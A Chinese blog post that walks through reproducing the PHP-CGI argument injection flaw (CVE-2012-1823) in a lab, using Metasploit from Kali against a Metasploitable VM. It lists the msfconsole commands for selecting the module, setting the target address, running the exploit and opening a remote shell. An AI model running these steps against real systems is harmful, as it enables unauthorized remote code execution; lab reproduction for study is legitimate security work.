首页 > 编程语言 >PHP CGI漏洞利用

PHP CGI漏洞利用

时间:2022-08-15 21:57:08浏览次数:46  
标签:CGI cgi multi php http 漏洞 exploit injection PHP

PHP CGI漏洞利用

今日复现一个早期的漏洞,PHP CGI漏洞,代号为cve:2012-1823,该漏洞暂时只能攻击linux系统,属于linux漏洞

使用工具:攻击机kali linux、靶机metasploitable linux

具体步骤如下:

1.登入msfconsloe

image

2.搜索漏洞代号,输入 search cve:2012-1823

image

3.复制粘贴exploit/multi/http/php_cgi_arg_injection 或者use 0

详细如下:
msf > use exploit/multi/http/php_cgi_arg_injection
或者
msf > use 0
image

4.进行相关设置

msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 192.168.30.141
rhosts => 192.168.30.141
msf6 exploit(multi/http/php_cgi_arg_injection) >
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
image

5.开始攻击

msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
image

6.攻击成功,输入shell,可进入被攻击方的命令提示符,权限为系统管理员权限

meterpreter > shell
image

标签:CGI,cgi,multi,php,http,漏洞,exploit,injection,PHP
From: https://www.cnblogs.com/luuxiaoming/p/16589781.html

相关文章

  • php新建画布并设置颜色
    <?phpheader("Content-Type:image/png");$img=imagecreatetruecolor(400,300);//imagejpeg($img);//imagejpeg($img,"./img/copy_img01.jpg",10);$color1=imagecol......
  • php生成四位随机数
    1<?php23$arr1=array_merge(range('A','Z'),range(0,9),range('a','z'));//生成数组且合并为arr14shuffle($arr1);......
  • PHP自助建站系统源码
    PHP自助建站系统源码说明:内置大量模板一键生成网站,带充值接口+卡密生成+代理系统,小白适用百度网盘下载链接:https://pan.baidu.com/s/1CgwyXbCL51JD8eCuzU8weA?pwd=cxc......
  • php大附件上传,支持断点续传
    ​最近遇见一个需要上传超大大文件的需求,调研了七牛和腾讯云的切片分段上传功能,因此在此整理前端大文件上传相关功能的实现。在某些业务中,大文件上传是一个比较重要的交......
  • PHP加密JS解密【转】
    转载地址:https://www.fengjinwei.com/blog-1139759.htmlPHP加密:functionstrencode2($string){$string=base64_encode($string);$key='123456';......
  • php 导出pdf
    1、接口生成查询参数$exportCS=urlSafeB64Encode(msgpack_pack(['key'=>'value']))2、解析查询参数,获取查询数据结果$condition=msgpack_unpack(urlSafeB64D......
  • thinkphp6中关于时间的查询方法
    whereTime用法一:查询今天的数据$list=$userModel->whereTime('add_time','today')->select();同理,替换参数today后可以查询昨天(yesterday)、本周(week)、下周(last......
  • PHP与JS互相加密解密方法2.0【转载】
    本文转自:https://blog.csdn.net/qq_32845825/article/details/123705487前言:之前写过一个加密解密1.0版本的,但是随着PHP版本升级,那个不能用了,当初使用的是PHP5中的mcrypt......
  • php以图形方式显示中文,指定ttf字库
    1<?php2header("Content-Type:image/png");3$img=imagecreatetruecolor(400,300);4//imagejpeg($img);5//imagejpeg($img,"./img/copy_img01.jpg",10);......